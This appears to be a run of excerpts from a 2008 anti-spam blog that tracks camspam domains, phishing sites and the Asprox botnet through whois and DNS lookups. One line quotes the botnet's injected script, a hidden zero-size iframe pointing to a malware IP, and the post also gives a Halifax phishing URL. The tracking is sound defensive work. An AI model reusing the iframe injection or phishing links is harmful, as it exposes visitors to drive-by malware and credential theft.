Silent noise - about spam, trojans and other nasty stuff

I don't know what a registrar does when suspending a domain.
But I take it for granted that registrars know that.

Directi should know, I guess.

I was floating on a wave of dirt and ended up at the IP-address 220.164.144.202.
So I float away to Spamhaus to that IP and get a long list of which some apparently are camspam domains.

I have written about a couple of those earlier, so I checked one of them, ccmaria. com.
Not listed in SBL71930 about 220.164.144.202.

So I checked the whois and a dig:

Domain Name: CCMARIA.COM

A few days ago I wrote that the javascript files on the Asprox botnet was now pointing to a static IP instead of infected PCs on the botnet. Or more correctly: The content of the webpage hosted by the infected PCs on the Asprox botnet is an iframe from 91.203.93.4, inserted via javascript like this:

document.write("<iframe src=h||p://91.203.93.4/ cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");

I have followed this the last days, only manually, I don't have the tools nor the knowledge to automate this.

I mentioned in my last post, "xml48.com - again a Abbey Bank phish and a malware installer .." that I also received another phishing spam that day, for Halifax.
I checked a bit around that one today. Either the spammer screwed up the link in the spam or the phishing page has been taken down.
The link was: http://ww4.halifax-secure.co.uk.lvozx90.com/mem_bin/formssecure.aspsource=halifaxcoukHOME1/

But I had a look at the hosting for ww4.halifax-secure.co.uk.lvozx90.com:

ww4.halifax-secure.co.uk.lvozx90.com. 180 IN A  75.75.182.238

Just in, this one.
Spamvertised domain is mycamchicks.com. With further links to camcrush.com and camgenie.com.

Whois info and "hosting" for mycamchicks.com is a bit interesting.
First the whois info:

Domain Name: MYCAMCHICKS.COM
   Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
   Whois Server: whois.dns.com.cn
   Referral URL: http://www.dns.com.cn
   Name Server: NS4.MYOOODNS.COM
   Name Server: NS5.MYOOODNS.COM
   Name Server: NS6.MYOOODNS.COM
   Name Server: NS7.MYOOODNS.COM
   Status: clientTransferProhibited
   Updated Date: 05-may-2008

I activated a parked domain back in March, testing a new host and the import of the old WordPress database into Drupal for use on this site.
Catchall for email was also activated out of curiosity, but I forgot about it.
About a week ago I logged in to delete everything and set the status to parked again.
And discovered +300 pieces of spam. That is not much and it was mostly the usual stuff: Pills and counterfeit goods of various sorts.